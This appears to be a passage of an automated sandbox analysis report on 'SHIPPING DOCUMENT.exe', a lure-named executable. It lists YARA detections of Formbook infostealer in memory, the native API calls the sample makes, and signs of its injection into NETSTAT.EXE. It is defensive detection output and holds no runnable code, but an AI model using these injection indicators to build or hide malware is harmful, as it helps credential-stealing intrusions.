          Source: 1.1.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Executable has a suspicious name (potential lure to open the executable)Show sources
          Source: SHIPPING DOCUMENT.exeStatic file information: Suspicious name
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: SHIPPING DOCUMENT.exe
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00419D60 NtCreateFile,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00419E10 NtReadFile,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00419E90 NtClose,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00419F40 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00419D5A NtCreateFile,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00419E0A NtReadFile,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00419E8A NtClose,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00419F3A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B098F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B095D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B096E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B097A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B098A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B0B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B099D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09A10 NtQuerySection,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B0A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B095F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B0AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09560 NtWriteFile,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B096D0 NtCreateKey,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B0A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B0A770 NtOpenThread,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B09760 NtOpenProcess,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_1_00419D60 NtCreateFile,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_1_00419E10 NtReadFile,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_1_00419E90 NtClose,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_1_00419F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039096D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039096E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039095D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0390A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039097A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0390A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0390A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039099D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039095F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0390AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909560 NtWriteFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039098A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039098F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03909820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0390B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DD9E90 NtClose,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DD9E10 NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DD9F40 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DD9D60 NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DD9E8A NtClose,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DD9E0A NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DD9F3A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DD9D5A NtCreateFile,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 0_2_00406925
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_0041E1FC
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_0041D260
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_0041DA2A
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_0041BDC4
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00409E40
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00409E3C
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_0041D6DF
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_0041DFA3
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF20A0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B920A8
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ADB090
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B81002
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AE4120
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACF900
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B922AE
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFEBB0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B8DBD2
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B92B28
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD841F
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF2581
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ADD5E0
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC0D20
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B92D07
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B91D55
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B92EF7
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AE6E30
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B91FF1
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_1_00401030
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_1_0041E1FC
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_1_0041D260
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_1_0041DA2A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FEBB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0398DBD2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03991FF1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03992B28
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039922AE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03992EF7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038E6E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F2581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038DD5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CF900
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03992D07
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C0D20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038E4120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03991D55
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038DB090
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F20A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039920A8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D841F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03981002
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DDE1FC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DC9E40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DC9E3C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DC2FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DDDFA3
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DDBDC4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_02DC2D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 038CB150 appears 35 times
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: String function: 00ACB150 appears 35 times
          Source: SHIPPING DOCUMENT.exe, 00000000.00000003.653383612.000000000338F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SHIPPING DOCUMENT.exe
          Source: SHIPPING DOCUMENT.exe, 00000001.00000002.700777505.0000000000D4F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs SHIPPING DOCUMENT.exe
          Source: SHIPPING DOCUMENT.exe, 00000001.00000002.700415930.000000000080A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamenetstat.exej% vs SHIPPING DOCUMENT.exe
          Source: SHIPPING DOCUMENT.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.661322620.00000000023D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.700344342.0000000000710000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.915966424.0000000003210000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.700119931.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.915737678.0000000002DC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.915997507.0000000003240000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.656834932.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.700254188.00000000005A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.SHIPPING DOCUMENT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.SHIPPING DOCUMENT.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.SHIPPING DOCUMENT.exe.23d0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
